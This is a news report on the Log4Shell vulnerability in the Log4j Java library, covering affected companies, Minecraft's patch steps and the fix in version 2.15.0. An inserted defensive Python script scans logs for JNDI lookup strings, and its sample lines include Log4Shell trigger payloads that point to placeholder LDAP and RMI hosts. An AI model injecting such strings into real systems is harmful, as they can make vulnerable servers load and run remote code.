The Log4j vulnerability, first reported on Friday, is turning out to be a cybersecurity nightmare that likely impacts a wide range of products, from Apple’s iCloud to Twitter to Microsoft’s Minecraft to Amazon and a number of other enterprise products.
The Log4j software flaw, as reported by cybersecurity researchers, could allow attackers uncontrolled access to computer systems, and even the US government’s cybersecurity agency has issued a warning about it. Here’s everything we know so far.
The vulnerability is also dubbed Log4Shell and was first highlighted by researchers at LunaSec. The issue was discovered in Microsoft-owned Minecraft, though LunaSec warns that “many, many services” are vulnerable to this exploit because of Log4j’s “ubiquitous” presence: this open-source Java logging library is used in almost all major Java-based enterprise apps and servers across the industry.
Tracked as CVE-2021-44228 (the official identifier assigned to each software vulnerability as it is discovered), the vulnerability can allow an attacker to execute ‘arbitrary code’ and gain access to a computer system; when exploited correctly, it can give an attacker complete control of a server. The Log4j library is used in Java applications to keep a record of activity and is therefore very commonly used by software developers across the world.
The technical description in the CVE entry states that “An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.” The worrisome part is that the exploit has likely already been used by hackers to gain access to certain computer systems, and now that the exploit is public, companies will have to patch it soon.
According to reports, the problem has been patched for everyone on Log4j 2.15.0 and above, as the vulnerable lookup behaviour is disabled by default in that release.
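As an added illustration that is not part of the original report or of the Log4j project: the CVE text above says the trigger is attacker-controlled text reaching a log message, and that 2.15.0 is the first release with the lookup disabled. The small Python script below shows the two checks a defender would run first, scanning log lines for the `${jndi:...}` lookup pattern the advisory describes and comparing a Log4j version string against 2.15.0. The log lines and the `placeholder.example` host names are constructed sample data, not real captures.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample log lines (not real captures). Line 2 and 3 show what it
# looks like when user-controlled input containing a lookup string is logged.
SAMPLE_LOG_LINES = [
    '2021-12-10T14:02:11Z INFO  Player "steve" joined the game',
    '2021-12-10T14:02:15Z INFO  User-Agent: ${jndi:ldap://placeholder.example/a}',
    '2021-12-10T14:02:19Z WARN  login failed for ${JNDI:rmi://placeholder.example:1099/x}',
    '2021-12-10T14:03:01Z INFO  device name set to "My iPhone"',
]

# A message lookup of the form ${jndi:<scheme>:...}. Matched case-insensitively
# because the lookup prefix itself is not case-sensitive.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

# First Log4j 2.x release in which message lookups are disabled by default,
# as stated in the article.
PATCHED_VERSION: Tuple[int, int, int] = (2, 15, 0)


def find_jndi_lookups(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per log line that carries a JNDI lookup string.

    Each record holds the 1-based line number, the lookup scheme (ldap, rmi,
    dns, ...) and the raw line, which is what an analyst needs to triage.
    """
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(lines, start=1):
        match = JNDI_LOOKUP.search(line)
        if match:
            hits.append({
                "line": lineno,
                "scheme": match.group(1).lower(),
                "text": line,
            })
    return hits


def parse_version(version: str) -> Tuple[int, int, int]:
    """Parse 'major.minor.patch' (extra suffixes such as '-rc1' are ignored)."""
    numbers: List[int] = []
    for part in version.strip().split(".")[:3]:
        digits = re.match(r"\d+", part)
        numbers.append(int(digits.group()) if digits else 0)
    while len(numbers) < 3:
        numbers.append(0)
    return numbers[0], numbers[1], numbers[2]


def is_vulnerable_version(version: str) -> bool:
    """True for any Log4j 2.x release below 2.15.0 (the 1.x line is out of scope here)."""
    parsed = parse_version(version)
    return parsed[0] == 2 and parsed < PATCHED_VERSION


def scan_report(lines: List[str], log4j_version: str) -> Dict[str, object]:
    """Combine both checks into one summary a responder can act on."""
    hits = find_jndi_lookups(lines)
    return {
        "log4j_version": log4j_version,
        "version_vulnerable": is_vulnerable_version(log4j_version),
        "lookup_attempts": len(hits),
        "schemes_seen": sorted({str(h["scheme"]) for h in hits}),
    }


if __name__ == "__main__":
    # Hypothetical deployed version, chosen to show the 'needs patching' path.
    for hit in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: {hit['scheme']} lookup -> {hit['text']}")
    print(scan_report(SAMPLE_LOG_LINES, "2.14.1"))
```

A non-empty `lookup_attempts` count means someone has already tried to get a lookup string into your logs; together with `version_vulnerable` being true, that is the combination that should trigger an immediate upgrade to 2.15.0 or later and a closer look at the affected hosts.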
According to cybersecurity firm LunaSec, many services are vulnerable to the Log4Shell exploit, including the gaming service Steam, Apple’s iCloud and others. Microsoft’s Minecraft has already issued a statement on how users can update the game to avoid the issue. Other open-source projects such as Paper are also issuing patches to fix the problem, the blog adds.
On GitHub, the companies listed as impacted include Apple, Tencent, Steam, Twitter, Baidu, DIDI, JD, NetEase, CloudFlare, Amazon, Tesla, Google, Webex, LinkedIn and others. LunaSec also notes that simply changing an iPhone’s name was enough to trigger the vulnerability in Apple’s servers. Most of the companies have yet to issue a statement.
Minecraft said in a statement that Minecraft Java Edition is affected and that it poses a risk of the player’s computer being compromised. The Java Edition allows crossplay between Windows, macOS, and Linux for Minecraft players.
The statement adds that the exploit has been “addressed with all versions of the game client patched,” but users will still need to take additional steps to secure the game and their servers. Players who are not hosting Minecraft Java Edition on their own servers need to close all running instances of the game and the Minecraft Launcher, then start the launcher again, after which the “patched version will download automatically.”
For those on modified clients and third-party launchers, the automatic download might not take place, and Minecraft recommends “following the advice of your third-party provider.”
“If the third-party provider has not patched the vulnerability, or has not stated it is safe to play, you should assume the vulnerability is not fixed and you are at risk by playing,” the statement adds.
Meanwhile, NetApp, which provides data management solutions for the cloud, has also put out a statement that its products are vulnerable because they use Log4j widely. The statement added that all versions prior to 2.15.0 are susceptible to the vulnerability and that “successful exploitation of this vulnerability could lead to the disclosure of sensitive information, addition or modification of data, or Denial of Service (DoS).”
According to Wired, researchers suspect many mainstream services will be affected. Further, some Twitter users began changing their display names to code strings that could trigger the exploit.